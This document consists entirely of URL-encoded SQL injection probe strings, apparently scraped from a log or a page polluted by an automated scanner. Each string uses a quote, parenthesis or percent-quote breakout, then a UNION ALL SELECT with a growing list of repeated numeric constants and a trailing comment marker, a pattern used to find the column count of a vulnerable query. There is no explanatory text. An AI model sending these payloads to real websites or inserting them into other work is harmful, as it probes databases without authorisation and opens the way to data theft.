-9897%22%20UNION%20ALL%20SELECT%201855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855%2C1855--%20 -2059%22%29%20UNION%20ALL%20SELECT%208316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316%2C8316--%20 -8369%22%29%20UNION%20ALL%20SELECT%206433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433--%20 -9402%22%29%20UNION%20ALL%20SELECT%201648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648%2C1648--%20 -4808%22%29%20UNION%20ALL%20SELECT%201040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040%2C1040--%20 -7581%22%29%20UNION%20ALL%20SELECT%205569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569%2C5569--%20 -5038%22%29%20UNION%20ALL%20SELECT%201109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109%2C1109--%20 -1026%22%29%20UNION%20ALL%20SELECT%204151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151%2C4151--%20 -1390%22%29%20UNION%20ALL%20SELECT%205874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874%2C5874--%20 -8328%22%29%20UNION%20ALL%20SELECT%208365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365%2C8365--%20 -6763%22%29%20UNION%20ALL%20SELECT%201087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087%2C1087--%20 -9264%22%29%29%20UNION%20ALL%20SELECT%205058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058--%20 -8260%22%29%29%20UNION%20ALL%20SELECT%207242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242%2C7242--%20 -3015%22%29%29%20UNION%20ALL%20SELECT%209244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244%2C9244--%20 -9020%22%29%29%20UNION%20ALL%20SELECT%203086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086%2C3086--%20 -4917%22%29%29%20UNION%20ALL%20SELECT%206746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746%2C6746--%20 -7614%22%29%29%20UNION%20ALL%20SELECT%208159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159%2C8159--%20 -3555%22%29%29%20UNION%20ALL%20SELECT%208520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520%2C8520--%20 -5025%22%29%29%20UNION%20ALL%20SELECT%207847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847--%20 -6275%22%29%29%20UNION%20ALL%20SELECT%201945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945--%20 -8375%22%29%29%20UNION%20ALL%20SELECT%202603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603%2C2603--%20 -3644%22%29%29%29%20UNION%20ALL%20SELECT%203084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084%2C3084--%20 -9715%22%29%29%29%20UNION%20ALL%20SELECT%203060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060%2C3060--%20 -1181%22%29%29%29%20UNION%20ALL%20SELECT%207683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683%2C7683--%20 -2939%22%29%29%29%20UNION%20ALL%20SELECT%203750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750--%20 -4364%22%29%29%29%20UNION%20ALL%20SELECT%201189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189--%20 -1180%22%29%29%29%20UNION%20ALL%20SELECT%201958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958%2C1958--%20 -3739%22%29%29%29%20UNION%20ALL%20SELECT%201362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362%2C1362--%20 -8714%22%29%29%29%20UNION%20ALL%20SELECT%203887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887%2C3887--%20 -5065%22%29%29%29%20UNION%20ALL%20SELECT%203624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624%2C3624--%20 -8595%22%29%29%29%20UNION%20ALL%20SELECT%207671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671--%20 -6204%22%20UNION%20ALL%20SELECT%207486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486%2C7486--%20 -4416%22%20UNION%20ALL%20SELECT%205215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215%2C5215--%20 -9080%22%20UNION%20ALL%20SELECT%208837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837%2C8837--%20 -3393%22%20UNION%20ALL%20SELECT%206362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362%2C6362--%20 -1491%22%20UNION%20ALL%20SELECT%208653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653--%20 -2219%22%20UNION%20ALL%20SELECT%206454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454--%20 -7521%22%20UNION%20ALL%20SELECT%202988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988--%20 -7463%22%20UNION%20ALL%20SELECT%206545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545%2C6545--%20 -6894%22%20UNION%20ALL%20SELECT%204614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614%2C4614--%20 -6934%22%20UNION%20ALL%20SELECT%207364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364%2C7364--%20 -4443%25%27%29%20UNION%20ALL%20SELECT%208812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812%2C8812--%20 -1559%25%27%29%20UNION%20ALL%20SELECT%206433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433%2C6433--%20 -5946%25%27%29%20UNION%20ALL%20SELECT%207967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967--%20 -6696%25%27%29%20UNION%20ALL%20SELECT%204968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968%2C4968--%20 -1446%25%27%29%20UNION%20ALL%20SELECT%206729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729%2C6729--%20 -4862%25%27%29%20UNION%20ALL%20SELECT%207121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121%2C7121--%20 -8179%25%27%29%20UNION%20ALL%20SELECT%205564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564%2C5564--%20 -4324%25%27%29%20UNION%20ALL%20SELECT%207588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588--%20 -5069%25%27%29%20UNION%20ALL%20SELECT%206920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920--%20 -9496%25%27%29%20UNION%20ALL%20SELECT%203285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285%2C3285--%20 -4733%25%27%29%29%20UNION%20ALL%20SELECT%205509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509%2C5509--%20 -6665%25%27%29%29%20UNION%20ALL%20SELECT%205351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351--%20 -7175%25%27%29%29%20UNION%20ALL%20SELECT%206370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370%2C6370--%20 -4364%25%27%29%29%20UNION%20ALL%20SELECT%202821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821%2C2821--%20 -7273%25%27%29%29%20UNION%20ALL%20SELECT%204499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499%2C4499--%20 -8400%25%27%29%29%20UNION%20ALL%20SELECT%206007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007%2C6007--%20 -1698%25%27%29%29%20UNION%20ALL%20SELECT%206803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803%2C6803--%20 -6053%25%27%29%29%20UNION%20ALL%20SELECT%204231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231%2C4231--%20 